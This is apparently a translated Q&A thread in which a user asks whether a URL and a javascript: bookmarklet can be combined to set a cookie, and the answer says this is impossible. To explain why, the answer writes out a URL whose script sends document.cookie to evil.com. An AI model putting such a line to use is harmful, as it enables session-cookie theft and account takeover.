将URL和javascript书签组合在一起

时间:2011-11-29 01:53:40

标签: url bookmarklet

我需要访问某人网站上的某些数据。访问该页面的方法是访问http://www.foosite.com,然后点击包含javascript:foo();的链接以显示真实数据。

foo()就像:

function foo(param){
    createXXXCookie('COOKIE_NAME', param, 60);
    window.location.href="/current/location";
}

所以这基本上是设置cookie并重新加载页面。在页面加载期间,文档准备好读取COOKIE_NAME并显示相应的数据。

我想使用MS Excel从此页面获取一些数据。所以我一直在寻找一种获取数据的方法。因为在浏览器地址栏中,我可以先输入http://www.foosite.com,然后输入javascript:foo();来调用foo()。我想知道组合URL和书签,如http://www.foosite.com;javascript:foo();是否可行?我实际上尝试了这一点,但似乎IE / FF / GC将跳过javascript:...部分并且只是继续URL的第一部分。

1 个答案:

答案 0 :(得分:1)

这是不可能的。

如果有可能,那将是一个致命的安全漏洞。

通过电子邮件向某人发送http://somebank.com;javascript:$.getScript('http://evil.com/steal?payload=' + encodeURIComponent(document.cookie))的短链接,然后从那里继续发送到自动提交表单。